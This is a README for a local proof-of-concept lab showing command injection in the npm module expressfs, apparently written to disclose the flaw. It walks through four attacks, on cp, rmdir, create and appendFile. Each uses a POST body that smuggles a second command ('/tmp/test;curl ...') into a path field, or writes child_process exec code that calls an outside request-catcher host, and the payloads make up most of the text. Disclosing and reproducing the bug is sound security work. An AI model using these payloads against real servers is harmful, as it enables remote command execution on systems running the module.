readme.md

Command Injection @ expressfs

• module : expressfs
• version : All
• severity: high

Installation

docker-compose up --build

Lunch Attack On 'expressfs.cp'

1. open the browser and enter the following url https://shieldfy.requestcatcher.com/

   NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack

2. launch this POST request from postman http://localhost:8000/expressfs.cp

   • BODY

     KEY	VALUE
     destination	/tmp/test;curl https://shieldfy.requestcatcher.com/hacked-expressfs.cp

3. CHECK the requestcatcher tab in the browser you will see the result of command injection attack

Lunch Attack On 'expressfs.rmdir'

1. open the browser and enter the following url https://shieldfy.requestcatcher.com/

   NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack

2. launch this POST request from postman http://localhost:8000/expressfs.rmdir

   • BODY

     KEY	VALUE
     path	/tmp/test;curl https://shieldfy.requestcatcher.com/hacked-expressfs.rmdir

3. CHECK the requestcatcher tab in the browser you will see the result of command injection attack

Lunch Attack On 'expressfs.create'

1. open the browser and enter the following url https://shieldfy.requestcatcher.com/

   NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack

2. launch this POST request from postman http://localhost:8000/expressfs.create

   • BODY

     KEY	VALUE
     path	./eviil.js
     content	exec = require('child_process').exec;exec("curl https://shieldfy.requestcatcher.com/hacked-expressfs.create")

3. CHECK the requestcatcher tab in the browser you will see the result of command injection attack

Lunch Attack On 'expressfs.appendFile'

1. open the browser and enter the following url https://shieldfy.requestcatcher.com/

   NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack

2. launch this POST request from postman http://localhost:8000/expressfs.appendFile

   • BODY

     KEY	VALUE
     path	./eviil.js
     content	; exec = require('child_process').exec;exec("curl https://shieldfy.requestcatcher.com/hacked-expressfs.appendFile")

3. CHECK the requestcatcher tab in the browser you will see the result of command injection attack